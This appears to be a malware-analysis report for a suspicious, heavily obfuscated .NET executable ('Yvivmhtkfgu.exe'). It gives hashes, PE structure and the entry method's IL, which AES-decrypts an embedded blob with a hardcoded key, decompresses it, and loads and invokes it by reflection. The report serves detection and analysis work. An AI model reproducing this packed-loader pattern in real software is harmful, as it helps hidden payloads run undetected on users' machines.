Suspicious
Suspect

16fe30dadaf9be2a6e33730ae7d7587b

PE Executable | MD5: 16fe30dadaf9be2a6e33730ae7d7587b | Size: 669.18 KB | application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very high

Hashes (algorithm: value)

MD5: 16fe30dadaf9be2a6e33730ae7d7587b
SHA1: 98c08a4b44525c851d5e727e13b11431ce9219fa
SHA256: 37f8a54ffb5377feb9b65b66e2da08ab3fb237321f2ae544cf597022d475a0db
SHA384: 619a092efaffae757cf7f570e1f53bf19b68bc479e38943f7bc3541c1704a0254fc3a1ef0699cf7da786896f40efe44e
SHA512: 84cb29887f29bc3faa87c36ba03ecbec66ed4044ccbbbd880d7496da53f09e37153e43f59a57cbd7a4a3a1c22cda187e9e4f820c0de4f64d6b20101230c1f738
SSDeep: 12288:VeKkUPYz+33eOAJYr2M93Cfwg54NEcQXx9l0JAtkID3EO6OXIKl:aUcOOwELbh9l0JATEO5
TLSH: 64E423E8B7856D8BE5BBFB7056E123ECD33B96A8C336C01D165802756B8665C4030EB7

PeID

Microsoft Visual C++ DLL
Microsoft Visual C++ v6.0
File Structure
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rsrc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Information (name: value)

PE Detect: PeReader OK (file layout)
Module Name: Yvivmhtkfgu.exe
Full Name: Yvivmhtkfgu.exe
EntryPoint: System.Void WiA6OlGJKDfTanCTgQ.AGIRrOMSD1oYVFMUCW::iDHTm52La()
Scope Name: Yvivmhtkfgu.exe
Scope Type: ModuleDef
Kind: Windows
Runtime Version: v4.0.30319
Tables Header Version: 512
WinMD Version: <null>
Assembly Name: Yvivmhtkfgu
Assembly Version: 1.0.0.0
Assembly Culture: <null>
Has PublicKey: False
PublicKey Token: <null>
Target Framework: .NETFramework,Version=v4.5
Total Strings: 4
Main Method: System.Void WiA6OlGJKDfTanCTgQ.AGIRrOMSD1oYVFMUCW::iDHTm52La()
Main IL Instruction Count: 146

Main IL

newobj System.Void System.IO.MemoryStream::.ctor() stloc.0 <null> call System.Security.Cryptography.Aes System.Security.Cryptography.Aes::Create() stloc.s V_4 ldloc.s V_4 ldc.i4 256 callvirt System.Void System.Security.Cryptography.SymmetricAlgorithm::set_KeySize(System.Int32) ldloc.s V_4 ldstr awibD+HV/anVvBWbkCStOtLupd7Ru+EksGrtCNkgPd4= call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.Void System.Security.Cryptography.SymmetricAlgorithm::set_Key(System.Byte[]) ldloc.s V_4 ldstr wdd0kHPC1yyDufBbTyhJqA== call System.Byte[] System.Convert::FromBase64String(System.String) callvirt System.Void System.Security.Cryptography.SymmetricAlgorithm::set_IV(System.Byte[]) ldloc.s V_4 ldloc.s V_4 callvirt System.Byte[] System.Security.Cryptography.SymmetricAlgorithm::get_Key() ldloc.s V_4 callvirt System.Byte[] System.Security.Cryptography.SymmetricAlgorithm::get_IV() callvirt System.Security.Cryptography.ICryptoTransform System.Security.Cryptography.SymmetricAlgorithm::CreateDecryptor(System.Byte[],System.Byte[]) stloc.s V_5 newobj System.Void System.IO.MemoryStream::.ctor() stloc.s V_6 ldc.i4 662384 newarr System.Byte dup <null> ldtoken <PrivateImplementationDetails>/xwZRwODvhucKE2XMwn <PrivateImplementationDetails>::0D72526D230E75980C8F14378461003A72C05674DFE245FFB5CF80BD433576A2 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) newobj System.Void System.IO.MemoryStream::.ctor(System.Byte[]) stloc.s V_7 ldloc.s V_7 ldloc.s V_5 ldc.i4.0 <null> newobj System.Void System.Security.Cryptography.CryptoStream::.ctor(System.IO.Stream,System.Security.Cryptography.ICryptoTransform,System.Security.Cryptography.CryptoStreamMode) stloc.s V_8 ldloc.s V_8 ldloc.s V_6 callvirt System.Void System.IO.Stream::CopyTo(System.IO.Stream) ldloc.s V_6 callvirt System.Byte[] System.IO.MemoryStream::ToArray() newobj System.Void System.IO.MemoryStream::.ctor(System.Byte[]) stloc.s V_9 ldc.i4.4 
<null> newarr System.Byte stloc.s V_10 ldloc.s V_9 ldloc.s V_10 ldc.i4.0 <null> ldc.i4.4 <null> callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) pop <null> ldloc.s V_10 ldc.i4.0 <null> call System.Int32 System.BitConverter::ToInt32(System.Byte[],System.Int32) stloc.s V_11 ldloc.s V_9 ldc.i4.0 <null> newobj System.Void System.IO.Compression.GZipStream::.ctor(System.IO.Stream,System.IO.Compression.CompressionMode) stloc.s V_12 ldloc.s V_12 ldloc.0 <null> callvirt System.Void System.IO.Stream::CopyTo(System.IO.Stream) leave IL_0127: ldloc.0 ldloc.s V_12 brfalse IL_00DB: endfinally ldloc.s V_12 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_9 brfalse IL_00EA: endfinally ldloc.s V_9 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_8 brfalse IL_00F9: endfinally ldloc.s V_8 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_7 brfalse IL_0108: endfinally ldloc.s V_7 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_6 brfalse IL_0117: endfinally ldloc.s V_6 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_4 brfalse IL_0126: endfinally ldloc.s V_4 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.0 <null> callvirt System.Byte[] System.IO.MemoryStream::ToArray() stloc.1 <null> ldloc.0 <null> callvirt System.Void System.IO.Stream::Dispose() ldloc.1 <null> call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) stloc.2 <null> ldloc.2 <null> callvirt System.Type[] System.Reflection.Assembly::GetTypes() ldsfld System.Func`2<System.Type,System.Boolean> WiA6OlGJKDfTanCTgQ.AGIRrOMSD1oYVFMUCW/<>c::vfniCDcwH dup <null> brtrue IL_0163: call System.Type System.Linq.Enumerable::FirstOrDefault<System.Type>(System.Collections.Generic.IEnumerable`1<System.Type>,System.Func`2<System.Type,System.Boolean>) pop <null> ldsfld 
WiA6OlGJKDfTanCTgQ.AGIRrOMSD1oYVFMUCW/<>c WiA6OlGJKDfTanCTgQ.AGIRrOMSD1oYVFMUCW/<>c::MIBv4g2Wh ldftn System.Boolean WiA6OlGJKDfTanCTgQ.AGIRrOMSD1oYVFMUCW/<>c::l9hk9Ay5M(System.Type) newobj System.Void System.Func`2<System.Type,System.Boolean>::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Func`2<System.Type,System.Boolean> WiA6OlGJKDfTanCTgQ.AGIRrOMSD1oYVFMUCW/<>c::vfniCDcwH call System.Type System.Linq.Enumerable::FirstOrDefault<System.Type>(System.Collections.Generic.IEnumerable`1<System.Type>,System.Func`2<System.Type,System.Boolean>) stloc.3 <null> ldloc.3 <null> ldnull <null> call System.Boolean System.Type::op_Inequality(System.Type,System.Type) brfalse IL_01C0: ret ldloc.3 <null> ldstr mONZkCRrpS ldc.i4.s 28 callvirt System.Reflection.MethodInfo System.Type::GetMethod(System.String,System.Reflection.BindingFlags) stloc.s V_13 ldloc.s V_13 ldnull <null> call System.Boolean System.Reflection.MethodInfo::op_Inequality(System.Reflection.MethodInfo,System.Reflection.MethodInfo) brfalse IL_01C0: ret ldnull <null> stloc.s V_14 ldloc.s V_13 callvirt System.Boolean System.Reflection.MethodBase::get_IsStatic() brtrue IL_01A8: nop ldloc.3 <null> call System.Object System.Activator::CreateInstance(System.Type) stloc.s V_14 nop <null> ldloc.s V_13 ldloc.s V_14 ldnull <null> callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave IL_01C0: ret stloc.s V_15 leave IL_01C0: ret ret <null>

Characteristics
No malware configuration was found at this point.